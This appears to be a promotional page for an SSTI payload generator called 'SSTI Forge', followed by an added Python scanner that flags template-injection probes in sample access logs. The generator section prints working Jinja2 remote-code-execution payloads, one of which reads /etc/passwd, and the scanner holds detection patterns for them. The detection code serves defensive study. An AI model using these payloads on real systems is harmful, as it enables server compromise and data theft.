SSTI Forge
Template Injection Generator
Server-Side Template Injection (SSTI) is a critical vulnerability that frequently leads to remote code execution (RCE). SSTI Forge generates engine-specific payloads to detect and exploit template engines across Python, Java, PHP, and Ruby stacks.
Engines: Jinja2, Twig, Freemarker, Velocity, Mako
SSTI Generator
> rasec ssti --engine jinja2 --action rce
[+] Targeted Engine: Jinja2 (Python)
[+] Payload Type: Remote Code Execution
[1] {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
[2] {{ config.__class__.__init__.__globals__['os'].popen('ls -la').read() }}
[3] {{ "".__class__.__mro__[1].__subclasses__()[407]("cat /etc/passwd",shell=True,stdout=-1).communicate()[0].strip() }}
[+] Use with caution!
Key Features
1. Multi-Engine Support
Supports Jinja2, Twig, Freemarker, Velocity, and generic detection.
2. RCE Payloads
Generates payloads that execute system commands or read the running application's configuration.
3. Safe Detection
Includes non-destructive calculation payloads (e.g., {{7*7}}) for verification.
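The same strings the generator emits (the {{7*7}} verification probe and the Jinja2 `__class__`/`__globals__` introspection chain) are what a defender should be watching for in request logs. As an added example that is not part of SSTI Forge, a small Python scanner that flags them in constructed access-log lines:

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Arithmetic verification probes such as {{7*7}}, ${7*7}, #{7*7} or <%=7*7%>.
PROBE_RE = re.compile(r"(\{\{|\$\{|#\{|<%=)\s*\d+\s*[*+\-/]\s*\d+\s*(\}\}|\}|%>)")
# Python object-introspection attributes that Jinja2 RCE payloads chain together.
INTROSPECT_RE = re.compile(r"__(class|mro|subclasses|globals|builtins|import|init)__")
# Minimal common-log-format parser: client IP, method, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*? "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log lines (not real traffic); braces are URL-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=hello HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /profile?name=%7B%7Bconfig.__class__.__init__.__globals__%7D%7D HTTP/1.1" 200 800
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 2048
"""


def classify(target: str) -> Optional[str]:
    """Return a label for a suspicious request target, or None if it looks benign."""
    # Normalise URL encoding first so encoded braces are not missed by the patterns.
    decoded = unquote(target)
    if INTROSPECT_RE.search(decoded):
        return "ssti-introspection"  # attribute chain used by Jinja2 RCE payloads
    if PROBE_RE.search(decoded):
        return "ssti-probe"  # non-destructive calculation probe
    return None


def scan_log(text: str) -> List[dict]:
    """Parse each log line and return the entries that look like SSTI attempts."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as access-log entries
        label = classify(m.group("target"))
        if label:
            hits.append({"ip": m.group("ip"), "target": unquote(m.group("target")), "label": label})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['label']:<20} {hit['ip']:<10} {hit['target']}")
```

A probe hit on its own is reconnaissance; a probe followed by an introspection hit from the same client is the sequence to alert on and to check the template code for user-controlled template source.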